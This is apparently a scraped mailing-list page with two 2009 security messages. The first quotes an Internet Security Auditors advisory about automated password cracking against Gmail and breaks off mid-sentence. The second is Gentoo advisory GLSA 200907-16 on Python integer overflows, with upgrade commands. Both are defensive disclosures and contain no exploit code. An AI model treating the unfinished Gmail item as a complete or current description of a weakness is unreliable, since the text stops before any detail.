Instructor, CSSLP, OPSA, OPST OWASP Spain Chapter Leader vaguil...@isecauditors.com Internet Security Auditors www.isecauditors.com c. Santander, 101. Edif. A. 2º E-08030 Barcelona (Spain) Tel: +34 93 305 13 18 Fax: +34 93 278 22 48 Pº. de la Castellana, 164-166. Entlo. 1ª E-28046 Madrid (Spain) Tel: +34 91 788 57 78 Fax: +34 91 788 57 01 Este mensaje y los documentos que, en su caso lleve anexos, pueden contener información CONFIDENCIAL. Por ello, se informa al destinatario que la información contenida en el mismo es reservada y su uso no autorizado, publicación o difusión, entera o parcialmente, tanto en formato o medio físico como electrónico, sin el previo consentimiento de Internet Security Auditors, está prohibida legalmente. Si ha recibido este correo por error, le rogamos que nos lo comunique por la misma vía o por teléfono (93 305 13 18), se abstenga de realizar copias del mensaje o remitirlo o entregarlo a otra persona y proceda a borrarlo de inmediato. En cumplimiento de la Ley Orgánica 15/1999 de 13 de diciembre de protección de datos de carácter personal, Internet Security Auditors S.L., le informa de que sus datos personales se han incluido en ficheros informatizados titularidad de Internet Security Auditors S.L., que será el único destinatario de dichos datos, y cuya finalidad exclusiva es la gestión de clientes y acciones de comunicación comercial, y de que tiene la posibilidad de ejercer los derechos de acceso, rectificación, cancelación y oposición previstos en la ley mediante carta dirigida a Internet Security Auditors, c. Santander, 101. Edif. A. 2º 1ª, 08030 Barcelona, o vía e-mail a la siguiente dirección de correo: le...@isecauditors.com On Fri, Jul 17, 2009 at 2:48 PM, ISecAuditors Security Advisoriesadvisor...@isecauditors.com wrote: = INTERNET SECURITY AUDITORS ALERT 2009-NNN - Original release date: July 7th, 2009 - Last revised: July 17th, 2009 - Discovered by: Vicente Aguilera Diaz - Severity: 4.5/10 (CVSS Base Score) = I. VULNERABILITY - Gmail vulnerable to automated password cracking. II. BACKGROUND - Gmail is Google's free webmail service. It comes with built-in Google search technology and over 7,300 megabytes of storage (and growing every day). You can keep all your important messages, files and pictures forever, use search to quickly and easily find anything you're looking for, and make sense of it all with a new way of viewing messages as part of conversations. III. DESCRIPTION - An existing abuse of functionality in the Check for mail
[ GLSA 200907-16 ] Python: Integer overflows
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200907-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Python: Integer overflows Date: July 19, 2009 Bugs: #246991 ID: 200907-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple integer overflows in Python have an unspecified impact. Background == Python is an interpreted, interactive, object-oriented programming language. Affected packages = --- Package / Vulnerable / Unaffected --- 1 dev-lang/python 2.5.4-r2= 2.5.4-r2 *= 2.4.6 Description === Chris Evans reported multiple integer overflows in the expandtabs method, as implemented by (1) the string_expandtabs function in Objects/stringobject.c and (2) the unicode_expandtabs function in Objects/unicodeobject.c. Impact == A remote attacker could exploit these vulnerabilities in Python applications or daemons that pass user-controlled input to vulnerable functions. The security impact is currently unknown but may include the execution of arbitrary code or a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All Python 2.5 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-lang/python-2.5.4-r2 All Python 2.4 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-lang/python-2.4.6 References == [ 1 ] CVE-2008-5031 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5031 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200907-16.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.